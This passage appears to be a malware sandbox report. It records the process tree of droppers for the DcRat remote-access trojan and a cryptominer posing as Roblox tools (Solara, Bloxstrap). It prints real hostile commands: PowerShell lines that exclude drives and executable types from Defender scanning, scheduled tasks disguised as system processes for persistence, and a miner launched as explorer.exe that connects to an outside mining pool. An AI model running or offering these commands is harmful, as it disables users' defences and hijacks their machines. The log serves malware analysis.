        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4800 /prefetch:8
        6⤵
        
        PID:3376
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4832 /prefetch:2
        6⤵
        
        PID:1784
- - C:\Users\Admin\AppData\Local\Temp\solara.exe
    "C:\Users\Admin\AppData\Local\Temp\solara.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4192
      - C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
        
        "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\winlogon.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\SendTo\sppsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\Registry.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2240
        
        C:\Program Files\Internet Explorer\Registry.exe
        
        "C:\Program Files\Internet Explorer\Registry.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
- C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
  2⤵
  - DcRat
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
    3⤵
    PID:4576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
      4⤵
      PID:1684
    - - C:\winNet\ComContainerbrowserRefRuntime.exe
        
        "C:\winNet/ComContainerbrowserRefRuntime.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5180
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VESsa4Q6e5.bat"
        6⤵
        
        PID:2948
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3272
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1856
        
        C:\Windows\LiveKernelReports\conhost.exe
        
        "C:\Windows\LiveKernelReports\conhost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5764
- C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5868
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
      4⤵
      PID:5916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:776
  - - C:\Windows\System32\cmd.exe
      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      PID:6076
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
        5⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:6116
  - - C:\Windows\System32\cmd.exe
      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
      4⤵
      PID:6136
    - - C:\Users\Admin\Bloxstrap.exe
        
        C:\Users\Admin\Bloxstrap.exe
        5⤵
        Executes dropped EXE
        
        PID:568
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
        6⤵
        Suspicious use of SetThreadContext
        
        PID:3956
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        7⤵
        
        PID:5692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4652
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        7⤵
        Executes dropped EXE
        
        PID:2064
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        8⤵
        
        PID:5992
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
        7⤵
        
        PID:5960
- C:\Users\Admin\AppData\Local\Temp\Frage build.exe
  "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1592
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
    3⤵
    PID:1236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
      4⤵
      PID:2304
    - - C:\DriversavessessionDlldhcp\Roblox.exe
        
        "C:\DriversavessessionDlldhcp/Roblox.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        
        PID:4196
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40szjpr3\40szjpr3.cmdline"
        6⤵
        
        PID:3328
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAAC.tmp" "c:\winNet\CSC2D3D11311BB1459C859E705AB2291E36.TMP"
        7⤵
        
        PID:3540
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkt11ugp\nkt11ugp.cmdline"
        6⤵
        
        PID:5276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA6.tmp" "c:\Users\Default\SendTo\CSC298B554BE48545D7BEFA9E2BA0C5075.TMP"
        7⤵
        
        PID:5356
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crwrxth2\crwrxth2.cmdline"
        6⤵
        
        PID:132
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC90.tmp" "c:\Program Files\Internet Explorer\CSC74179172C5254D7BA93F433CC1975B61.TMP"
        7⤵
        
        PID:5100
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hyyii5l4\hyyii5l4.cmdline"
        6⤵
        
        PID:3416
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDA9.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSCE7785059AA1B4EE2B6E69A4DEAA7E1DF.TMP"
        7⤵
        
        PID:1224
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqdx0oev\yqdx0oev.cmdline"
        6⤵
        
        PID:5352
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFED2.tmp" "c:\winNet\CSCB210A7B3F9DB43EE896F5193545CE4F.TMP"
        7⤵
        
        PID:5552
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ggmdvj0p\ggmdvj0p.cmdline"
        6⤵
        Drops file in Windows directory
        
        PID:1204
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFEB.tmp" "c:\Windows\IdentityCRL\INT\CSCFB022689F64F454281863A9528E616A9.TMP"
        7⤵
        
        PID:4200
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqjigaoq\yqjigaoq.cmdline"
        6⤵
        
        PID:788
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "c:\Program Files\Java\jdk-1.8\include\win32\bridge\CSCCEEF9AE666D44A6AA9B3F0F2E3156C68.TMP"
        7⤵
        
        PID:5664
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymqbsffj\ymqbsffj.cmdline"
        6⤵
        
        PID:5688
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B1.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCAC9DC3C362B842389DD27FC647DBA81.TMP"
        7⤵
        
        PID:5576
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nbooucgh\nbooucgh.cmdline"
        6⤵
        
        PID:5512
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29B.tmp" "c:\winNet\CSC914BA3B3B01C4F879879E38F9C9BAD6.TMP"
        7⤵
        
        PID:5828
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3tbqmpqn\3tbqmpqn.cmdline"
        6⤵
        
        PID:5728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A8.tmp" "c:\Program Files\Microsoft Office\PackageManifests\CSCFD452B96B27B47E1B15A37F3D0011BC.TMP"
        7⤵
        
        PID:5848
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0tly5dnr\0tly5dnr.cmdline"
        6⤵
        Drops file in System32 directory
        
        PID:6040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74E.tmp" "c:\Windows\System32\CSC6EDE1823CE8C44998F71C1B5779EF3EF.TMP"
        7⤵
        
        PID:6084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2016
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5140
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4712
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5172
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5924
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3344
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4864
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:128
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1388
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyw7YfgZit.bat"
        6⤵
        
        PID:5552
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3672
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\msiexec.exe
        
        "C:\Users\Admin\AppData\Local\msiexec.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\winNet\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4520

C:\Windows\system32\schtasks.exe
